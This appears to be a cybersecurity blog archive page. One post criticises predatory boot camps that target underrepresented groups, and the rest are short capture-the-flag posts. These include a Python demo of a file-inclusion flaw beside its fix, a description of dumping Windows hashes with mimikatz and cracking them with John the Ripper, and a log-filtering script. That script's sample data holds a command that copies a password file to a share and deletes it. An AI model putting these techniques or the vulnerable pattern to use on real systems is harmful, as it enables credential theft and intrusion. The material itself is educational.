cybersecurity education

Let’s Talk About Cybersecurity Education

I read this article on tech boot camps, which inspired me to write this post.

Dreams Deferred

I recently presented at the CAE (Center for Academic Excellence) Forum, “Dreams Deferred: The Cost of Cybersecurity Education,” discussing boot camps/training center programs centered around cybersecurity.

The inspiration for my presentation came as I read articles discussing potential solutions to retain and strengthen the cybersecurity pipeline. But I didn’t see articles discussing the downside and downright predatory practices of some boot camps/training centers with underrepresented groups.

In the past three months, I encountered four African Americans lured into these programs. When I asked what made them want to pursue these boot camps/training centers, they described reading articles and watching the news discussing the cybersecurity workforce shortage. Each person believed that completing the boot camp/training center program would improve their lives by getting a job in cybersecurity.

(Almost) Dream Deferred

Their stories sparked memories of almost enrolling in a training center after high school. At that time, IT was a hot topic. I remember commercials describing students as “job ready” after completing the program, and IT experience was not required. I felt ahead of the curve as I had IT experience working at a non-profit during high school.

The plan was to go to class in the morning (8am-12pm) as classes were half-days (another selling point) and then go to work afterward. After describing this to my mentor, she advised me to not go down that path. Her words, “Jasmine go to community college, do not destroy your life. If something is too good to be true, most times it is.”

I’m glad my mentor gave that advice. If she hadn’t, I wouldn’t have done the amazing things in my career, such as being an intern for the first African American to receive a Doctorate in Computer Science (Dr. Clarence “Skip” Ellis), graduating with my Master’s in Computer Science and Graduate Certificate in Information Security and Privacy, traveling the world presenting cybersecurity topics, and mentoring the next generation of cybersecurity professionals.

Insidious and Predatory Practices

To better understand the insidious and predatory practices of boot camps/training centers, we need to discuss their patterns:

1. Create targeted ads and marketing to underrepresented groups

2. Lure the potential student to get into tech with little to no experience on an accelerated schedule of six months to one year

3. Make the program seem “exclusive” to rush the student to enroll as soon as possible

4. Have students sign private loans to pay for tuition, which on average is between $3k and $15k, with interest rates of 10%+

5. The coursework is too difficult for the student to master, and they drop out of the program.

OR

6. The coursework is too easy and doesn’t challenge the student

7. The student graduates from the program, doesn’t find a job and has thousands of dollars in debt.

Falling Prey

One of the four people that contacted me described this exact scenario. This person has a private loan for $12,000 with an interest rate of 13%. Their program is six months. I remember telling this person that my interest rate was never that high with all my years of education (Master’s). They also told me they were falling behind in their coursework as the curriculum had drastically increased. When I inquired more about the coursework, I found the curriculum is not accredited, and most of it is currently available on YouTube. After showing them this information, the person felt dejected. Their words, “I spent $12,000 to improve my life, and I could’ve done this on YouTube for free.”

Quality Cybersecurity Education for All

With the increased push to grow and strengthen the cybersecurity pipeline, mainly from the White House with the National Cybersecurity Workforce and Education Summit, the education that prospective cybersecurity professionals consume must be of high quality. This is extremely important for underrepresented populations, who are more susceptible to enrolling in the faulty programs described above.

I created my non-profit, T-ATP, to provide an environment for prospective cybersecurity professionals to receive quality cybersecurity training and education. Our mission – creating quality cybersecurity education accessible to all. Students shouldn’t go into debt to improve their lives through quality education.

To learn more or support T-ATP, visit the link here.

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Starting Point Series: Meow Machine

Another day, another challenge…

In today’s post we’re going to solve the Meow box from HackTheBox’s Starting Point Series.

The Meow box explores the following concepts – Linux, Networking (Telnet), and Account Misconfiguration.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Starting Point Series: Sequel Machine

Another day, another challenge…

In today’s post we’re going to solve the Sequel box from HackTheBox’s Starting Point Series.

The Sequel box explores the following concepts – Linux, SQL, MariaDB, and Weak Passwords.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Starting Point Series: Fawn Machine

Another day, another challenge…

In today’s post we’re going to solve the Fawn box from HackTheBox’s Starting Point Series.

The Fawn box explores the following concepts – Linux, FTP (File Transfer Protocol), and Account Misconfiguration.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Starting Point Series: Dancing Machine

Another day, another challenge…

In today’s post we’re going to solve the Dancing box from HackTheBox’s Starting Point Series.

The Dancing box explores the following concepts – Windows, SMB (Server Message Block) file shares, and Account Misconfiguration (a share that allows guest access).

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking, owasp, web application security

#PwnItFridays @hackthebox_eu Starting Point Series: Appointment Machine

Another day, another challenge…

In today’s post we’re going to solve the Appointment box from HackTheBox’s Starting Point Series.

The Appointment box explores the following concepts – Linux, Structured Query Language (SQL), SQL Injection (SQLi), and MariaDB, a community-supported fork of the MySQL database.

Want to learn more? Watch the below video.

Like the content — support by Buying a Coffee

capture the flag, hacking

@RealTryHackMe #AdventOfCyber Series: Challenge 6 – Patch Management Is Hard #TisTheSeasonForHacking

Another day, another challenge…

In this post, we’re starting a new series, the Advent of Cyber series, which is hosted by TryHackMe. This is the third year of Advent of Cyber, where a challenge is released every day leading up to Christmas. In total there will be 25 challenges. In these challenges, we’re McSkidy, an elf trying to save Christmas.

In our sixth challenge, we’re presented with a scenario where McSkidy discovered some recovery keys on a web application running on a server that should have been decommissioned. The elf in charge of decommissioning the server never got around to the task. McSkidy realizes that the recovery keys found there can be used to save other systems.

The topics explored in this challenge are Local File Inclusion (LFI) and Remote Command Execution (RCE). LFI is a vulnerability where a web application takes a file path from user input and includes or reads that file from the server without checking it. This is bad because ANY file the web server process has read permission on can be accessed, including files well outside the web root such as /etc/passwd or the application’s own configuration. LFI happens when user input is not sanitized or validated: the application accepts whatever path the user supplies, including ../ sequences that walk up the directory tree. The other topic explored is RCE. An LFI can escalate to RCE when the attacker can also get content they control written into a file the server will include (for example, placing code in a log file and then including that log), so when a user finds LFI it’s a good idea to check whether RCE is also possible. This will be helpful for our challenge.
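As an added example, not code from the original post or from the TryHackMe room, here is the vulnerable pattern described above and its hardened form in Python: a page-serving function that joins a user-supplied name onto the web root and reads whatever it points to, beside one that resolves the real path and refuses anything outside that root. The directory layout, file names and contents are constructed for the demo.

```python
import os
import tempfile


def serve_file_vulnerable(web_root: str, requested: str) -> str:
    """LFI-style bug: user input goes straight into the path with no validation.
    '../' walks out of web_root, and an absolute path makes os.path.join discard
    web_root entirely, so any file the server process can read is exposed."""
    path = os.path.join(web_root, requested)
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def serve_file_hardened(web_root: str, requested: str) -> str:
    """Resolve the candidate path (following symlinks and collapsing '..') and
    only open it if it is still strictly inside the resolved web root."""
    root = os.path.realpath(web_root)
    path = os.path.realpath(os.path.join(root, requested))
    if path == root or os.path.commonpath([root, path]) != root:
        raise PermissionError(f"blocked file inclusion outside web root: {requested!r}")
    with open(path, encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed layout: <tmp>/www/home.txt is a legitimate page and
    <tmp>/secret.txt sits one level above the web root (like the recovery keys
    in the challenge). Returns what each function gave back for each request."""
    tmp = tempfile.mkdtemp()
    web_root = os.path.join(tmp, "www")
    os.makedirs(web_root)
    with open(os.path.join(web_root, "home.txt"), "w", encoding="utf-8") as fh:
        fh.write("welcome")
    secret = os.path.join(tmp, "secret.txt")
    with open(secret, "w", encoding="utf-8") as fh:
        fh.write("constructed-recovery-key")

    def attempt(func, requested):
        try:
            return func(web_root, requested)
        except PermissionError:
            return "BLOCKED"

    return {
        "vuln_normal": attempt(serve_file_vulnerable, "home.txt"),
        "vuln_traversal": attempt(serve_file_vulnerable, "../secret.txt"),
        "vuln_absolute": attempt(serve_file_vulnerable, secret),
        "hard_normal": attempt(serve_file_hardened, "home.txt"),
        "hard_traversal": attempt(serve_file_hardened, "../secret.txt"),
        "hard_absolute": attempt(serve_file_hardened, secret),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:15s} -> {result}")
```

The vulnerable function hands back secret.txt for both ../secret.txt and an absolute path, while the hardened one blocks both. The check runs on the fully resolved path, after any URL decoding the framework has already done, so encoded ../ sequences and symlinks cannot sneak past it; where the set of includable pages is known, an allowlist of names is stricter still.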

Can McSkidy use the recovery keys to log into other systems? Find out below!

If you enjoy my content, buy me a coffee. Link –> http://buymeacoffee.com/thefluffy007

capture the flag, hacking, Uncategorized

@RealTryHackMe #AdventOfCyber Series: Challenge 24 – Learning From The Grinch #TisTheSeasonForHacking

Another day, another challenge…

In this post, we’re continuing the Advent of Cyber series, which is hosted by TryHackMe. This is the third year of Advent of Cyber, where a challenge is released every day leading up to Christmas. In total there will be 25 challenges. In these challenges, we’re McSkidy, an elf trying to save Christmas.

In our twenty-fourth challenge, we’re presented with a scenario where McSkidy wants to perform the same attacks Grinch Enterprises employed on the elves’ network to learn more about the attack. McSkidy will use the same machine that Grinch Enterprises compromised to understand the Grinch better.

The topic(s) explored in this challenge are post-exploitation, hashing, how passwords are stored in the Windows operating system, the mimikatz tool, and how to crack a password hash using the tool John The Ripper. Hashing is a one-way function: it turns input of any length into a fixed-size digest from which the original text cannot feasibly be recovered, so the only way to “crack” a hash is to guess candidates, hash each one and compare. There are many hashing algorithms, such as MD5, SHA1, SHA256, etc.

Post-exploitation is the phase after the attacker has gained access to a system. In this stage, the attacker wants to maintain persistence on the machine, meaning they do not want to lose their access, and to escalate their privileges from a standard user to an Administrator/root user.

Hashing is important because it leads into the next topic: how passwords are stored in the Windows operating system. Windows does not store passwords in the clear; local account password hashes are kept in the Security Account Manager (SAM) database. When a user types in a password, the Local Security Authority Subsystem Service (LSASS) hashes it and compares the result to the hash stored in the SAM. If the hashes match, the user successfully logs in. If they do not match, the user receives an “incorrect password” error.

Now that we know how passwords are stored and checked in Windows, we can dump them using the mimikatz tool, which reads hashes (and sometimes cleartext credentials) out of the memory of the LSASS process; this requires administrative/SYSTEM rights on the machine, which is why it belongs to post-exploitation. Finally, once we have a password hash, we can use the tool John The Ripper to crack it. With John The Ripper, we specify the hash format so it applies the right algorithm to every guess (for Windows NT hashes, --format=NT).

Can McSkidy use the Grinch’s nefarious activities to learn more about his attacks? Find out below!

If you enjoy my content, buy me a coffee. Link –> http://buymeacoffee.com/thefluffy007

capture the flag, hacking

@RealTryHackMe #AdventOfCyber Series: Challenge 23 – PowershELlF Magic #TisTheSeasonForHacking

Another day, another challenge…

In this post, we’re continuing the Advent of Cyber series, which is hosted by TryHackMe. This is the third year of Advent of Cyber, where a challenge is released every day leading up to Christmas. In total there will be 25 challenges. In these challenges, we’re McSkidy, an elf trying to save Christmas.

In our twenty-third challenge, we’re presented with a scenario where one of the admins from Elf Dome Enterprises realizes his password file is missing from his desktop. McSkidy suspects that a previous phishing attempt was successful and is on the hunt to figure out what happened.

The topic(s) explored in this challenge are PowerShell and Event Viewer. PowerShell is used to automate day-to-day administration tasks, but the same capability makes it a favorite of attackers, so what it runs is worth logging. PowerShell is available on Windows, Linux, and macOS. The second concept, Event Viewer, is the Windows front end to the Windows event logs. Each action Windows logs is recorded as an event with an event ID (which kind of thing happened) and a record ID (its sequence number in that log). Event Viewer is helpful because we can filter events by day, by activity/action (event ID), and/or by provider (such as Microsoft-Windows-PowerShell, whose script block logging records the code that was executed as event ID 4104). This will be helpful for the challenge.
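As an added example, not from the original post or the TryHackMe room, the following Python applies the filtering described above to event records in the XML shape that wevtutil qe exports: keep only a given provider, event ID and day, then find which PowerShell script blocks (event ID 4104) mention the missing file. The four records, their timestamps, record IDs and script text are constructed for the demo, and the <Events> wrapper is added only so they parse as one document.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed records in the XML layout that `wevtutil qe <log> /f:xml` emits.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <TimeCreated SystemTime="2021-12-21T17:02:44.120Z"/><EventRecordID>9870</EventRecordID>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel></System>
  <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">Get-Process | Sort-Object CPU -Descending</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4103</EventID>
    <TimeCreated SystemTime="2021-12-22T09:13:58.004Z"/><EventRecordID>10020</EventRecordID>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel></System>
  <EventData><Data Name="Payload">CommandInvocation(Get-Content): "Get-Content"</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
    <TimeCreated SystemTime="2021-12-22T09:14:02.511Z"/><EventRecordID>10021</EventRecordID>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel></System>
  <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">Get-Content C:\Users\elfadmin\Desktop\passwords.txt | Out-File \\10.0.0.5\loot\p.txt; Remove-Item C:\Users\elfadmin\Desktop\passwords.txt</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
    <TimeCreated SystemTime="2021-12-22T09:10:31.770Z"/><EventRecordID>55310</EventRecordID>
    <Channel>Security</Channel></System>
  <EventData><Data Name="TargetUserName">elfadmin</Data><Data Name="LogonType">2</Data></EventData>
</Event>
</Events>"""


def parse_events(xml_text: str) -> list:
    """Flatten each <Event> into a dict: provider, event_id, record_id, time, data{}."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.findall("e:Event", NS):
        system = ev.find("e:System", NS)
        events.append({
            "provider": system.find("e:Provider", NS).get("Name"),
            "event_id": int(system.findtext("e:EventID", namespaces=NS)),
            "record_id": int(system.findtext("e:EventRecordID", namespaces=NS)),
            "time": system.find("e:TimeCreated", NS).get("SystemTime"),
            "data": {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)},
        })
    return events


def filter_events(events: list, provider: str = None, event_id: int = None, day: str = None) -> list:
    """The same three knobs as the Event Viewer filter dialog: provider name,
    event ID, and a day given as 'YYYY-MM-DD' (matched against the UTC timestamp)."""
    kept = []
    for ev in events:
        if provider is not None and ev["provider"] != provider:
            continue
        if event_id is not None and ev["event_id"] != event_id:
            continue
        if day is not None and not ev["time"].startswith(day):
            continue
        kept.append(ev)
    return kept


def script_blocks_touching(events: list, filename: str) -> list:
    """Record IDs of 4104 script blocks whose logged code mentions the file."""
    blocks = filter_events(events, provider="Microsoft-Windows-PowerShell", event_id=4104)
    needle = filename.lower()
    return [ev["record_id"] for ev in blocks
            if needle in ev["data"].get("ScriptBlockText", "").lower()]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_XML)
    for ev in filter_events(evs, provider="Microsoft-Windows-PowerShell", event_id=4104, day="2021-12-22"):
        print(ev["record_id"], ev["time"], ev["data"]["ScriptBlockText"])
    print("blocks touching passwords.txt:", script_blocks_touching(evs, "passwords.txt"))
```

Filtering by provider, event ID and day is exactly what the Event Viewer filter dialog (or Get-WinEvent -FilterHashtable) does; once the 4104 record is found, its ScriptBlockText is the command that read and deleted the file. Long script blocks are split across several 4104 events, which the MessageNumber/MessageTotal fields and a shared ScriptBlockId let you stitch back together.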

Can McSkidy figure out how the admin from Elf Dome Enterprises lost his password file? Find out below!

If you enjoy my content, buy me a coffee. Link –> http://buymeacoffee.com/thefluffy007